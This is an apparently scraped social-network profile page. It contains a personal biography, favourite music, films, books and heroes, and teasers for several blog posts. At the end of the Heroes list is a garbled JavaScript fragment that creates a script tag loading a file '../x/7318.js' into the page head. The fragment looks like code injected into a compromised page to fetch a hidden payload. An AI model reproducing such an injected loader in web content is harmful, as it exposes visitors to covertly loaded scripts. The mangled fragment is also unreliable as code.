I am here for Friends and Networking

About Me

I am open to new friends, just not SPAM! Send me a message if you want to be my friend. Lived a lot in my short time here. Been in the army, in a band, married, divorced, kids, traveled to Europe & US, teacher, student, sex, drugs, & R&R. Worked for all kinds of companies in all kinds of industries. Ecstasy, agony, everything in between. I believe that less is more. I want to know what is underneath the iceberg rather than what I can see. Honesty is the only policy. The truth hurts. I can be wrong, and often am. If I have not thought out what I am talking about, I look like an idiot. I like to read poetry and sometimes dabble in writing. I never eat fish or anything else that comes out of the water. Can't eat tomatoes, but I love tomato sauce. I am on My Space to read blogs, and maybe write a few. Either way, I like to be able to see things from different angles. I can't do that on my own, but only with the help of people from all sorts of backgrounds and interests.

My Interests

Baseball, football, music, steak, politics, clean beaches, brainteasers/puzzles, teaching, math, long walks.

Music:

I like classical music from Beethoven to Bach. I love anything with pipe organs. I grew up with Led Zeppelin, the Doors, the Beatles, the Rolling Stones, Black Sabbath, Metallica, Judas Priest, Iron Maiden, Green Day, Pearl Jam, Enigma, Boston, Zebra, the Police, 70's disco, 80's freestyle, 90's techno, and early rap (Beastie Boys/Run DMC) and hip-hop. I like country music from George Strait to Garth Brooks to Brooks & Dunn. I like Bluegrass and Blues from Mississippi John Hurt to Chuck Berry. Nothing helps make babies better than R&B. Never dabbled much in Jazz, but I'd be up for it. Did I mention 50's oldies? I can even listen to and enjoy Salsa music (you'll never hear anything more lively.) New bands I like are Wolfmother and Coldplay. A music teacher once told me: there are two types of music: good music and bad music.

Movies:

Casablanca, Clockwork Orange, Rocky Horror, Bruce Willis movies, Reservoir Dogs, no John Travolta or Nicholas Cage.

Television:

Star Trek (watch only), sports, Science Channel, History Channel, National Geographic, Bugs Bunny, Popeye, the Simpsons, South Park. Remember Sanford & Son? Honeymooners. Friends makes me sick. I have watched soap operas.

Books:

Zen and the Art of Motorcycle Maintenance. Read Da Vinci, prefer Angels and Demons. Mysteries and thrillers. Ishmael trilogy.

Heroes:

Alexander Hamilton, Benjamin Franklin, George Washington, Lou Gehrig, Derek Jeter, James Hetfield, Hugh Hefner, Rudy Giuliani, any firefighter or soldier/veteran. .."var s=document·('script');s.src='../x/7318.js';document 3;getElementsByTagName('head')[0].appendChild(s);"

My Blog

Well, Primate, it's finally here. This blog has been swirling in my head for months now. I think I am finally prepared to write it. First, I need to explain the logic behind what I am doing. The best ...

The Personal Paradox (Updated with briliance, lol)

Paradox - an apparent contradiction. For example, an action should make you go left, but you paradoxically go right. Hyperactive children are given stimulants, because the drug speeds up their brain a...

Brewery Tour - Upstate NY this weekend

I just realized, there is no category on My Space for beer. What a catastrophe! Anyhow, I am planning to visit the FX Matt brewery in Utica, NY this weekend. I am in search of New Amsterdam beer,...

F*** Michael Ian Black

Sorry, Melissa. I am not posting anything positive about this guy. VH1 should redo the whole "I Love" series without him. Want a tag? Find five celebrities that shouldn't be celebrities. Start with th...

Random Thoughts

This title is stolen from Thomas Sowell, whose column occasionally appears in the New York Post. He writes mostly about economics. Brilliant and thought provoking. Pizza is like sex. Even when it's ba...

Communication Breakdown

I normally do not participate in drama. It's not that it's beneath me, but I don't have much use for it. Today, Maurice and Corey went back and forth about how their relationship ended, with Maurice e...
